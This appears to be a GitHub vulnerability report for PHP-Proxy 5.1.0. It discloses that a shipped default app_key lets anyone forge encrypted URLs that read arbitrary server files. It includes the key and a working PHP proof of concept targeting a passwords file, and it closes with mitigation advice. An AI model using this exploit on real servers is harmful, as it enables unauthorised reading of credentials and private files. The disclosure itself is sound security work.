Skip to content

PHP-Proxy 5.1.0 - Local File Inclusion (LFI) Vulnerability (on default pre-installed version) #134

Closed
@ameerpornillos

Description

@ameerpornillos

Brief description of this vulnerability:

Downloadable pre-installed version of PHP-Proxy 5.1.0 (current as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) make use of a default app_key wherein can be used for local file inclusion attacks. This can be used to generate encrypted string which can gain access to arbitrary local files in the server. (example: http://php-proxy-site/php-proxy/index.php?q=<encrypted_string_value>)

Affected Version:

5.1.0 (pre-installed version)

Reason of this vulnerability:

The downloadable pre-installed version of PHP-Proxy 5.1.0 (current pre-installed version as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) already contains the default app_key in config.php file which might be used by several users using the application thus is vulnerable to local file inclusion.

//default app_key from config.php file
$config['app_key'] = 'aeb067ca0aa9a3193dce3a7264c90187';

Encrypted URL value lies on the app_key as seen on a snippet of code below.

//encryption function of the application
$url = str_rot_pass($url, $key);

Wherein which the key is the encryption_key and by default, its value depends on the md5 hash of app_key and the visiting IP address.

//encryption_key depends on which default url_mode is set to 2 depends on the md5 hash of the app_key and IP address
Config::set('encryption_key', md5(Config::get('app_key').$_SERVER['REMOTE_ADDR']));

Combining all the functions above, an encrypted URL can be generated which contains the local file inclusion vulnerability payload.

Proof of Concept:

Code below will output an encrypted string which can exploit the local file inclusion vulnerability. Add the encrypted string on the PHP-Proxy 5.1.0 application URL: example: http://192.168.0.130/php-proxy/index.php?q=<encrypted_string_value> (replace <encrypted_string_value> with the generated encrypted string value)

<?php
$file = "file:///C:/xampp/passwords.txt"; //example target file to read
$ip = "192.168.0.1"; //change depending on your IP address that access the app
$app_key = "aeb067ca0aa9a3193dce3a7264c90187";
$key = md5($app_key.$ip);
function str_rot_pass($str, $key, $decrypt = false){
    $key_len = strlen($key);
    $result = str_repeat(' ', strlen($str));
    for($i=0; $i<strlen($str); $i++){
        if($decrypt){
            $ascii = ord($str[$i]) - ord($key[$i % $key_len]);
        } else {
            $ascii = ord($str[$i]) + ord($key[$i % $key_len]);
        }
        $result[$i] = chr($ascii);
    }
    return $result;
}
function base64_url_encode($input){
    return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');
}
echo base64_url_encode(str_rot_pass($file, $key));
?>

Below screenshot is an example of gaining an encrypted URL string within which used to read the C:/xampp/passwords.txt of the server.

php-proxy-5 1 0-lfi-vulnerability

Impact:

Gain access to arbitrary local files in the server.

Suggested Mitigation:

There is already a setup.txt included on the downloadable pre-installed version of PHP-Proxy which will generate and overwrite the default app_key, however users most probably don't use it and kept on using the default app_key.

Possible mitigation is make the app_key value in the config.php blank and make users just make use of the setup.txt to generate and overwrite the default app_key.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions